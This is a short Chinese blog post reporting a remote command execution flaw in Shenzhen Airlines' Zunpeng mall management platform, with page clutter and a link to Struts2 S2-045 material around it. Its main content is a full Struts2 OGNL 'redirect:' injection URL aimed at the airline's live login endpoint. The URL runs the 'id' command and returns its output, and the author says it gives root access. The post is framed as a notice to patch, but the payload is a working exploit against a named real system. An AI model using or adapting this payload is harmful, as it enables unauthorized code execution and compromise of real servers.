深圳航空安全漏洞# 某分站命令执行

问题站点:尊鹏商城管理平台 http://eshop.shenzhenair.com/szair/mc/login.jsp
这里只验证漏洞的存在性,并未深入,请及时修补


root权限

https://eshop.shenzhenair.com/szair/mc/rbac_login!signin.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(%22id%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
本文固定链接: http://www.ryhxl.com/44.html
阅读更多
文章标签: 深圳 航空
上一篇余额宝暴富记:为“草根”量身定做
下一篇办公小小结【有待更新】
想对作者说点什么? 我来说一句

Apache_Struts2漏洞(S2-045,CVE-2017-5638)

2018年01月20日 4.71MB 下载

没有更多推荐了,返回首页

关闭
关闭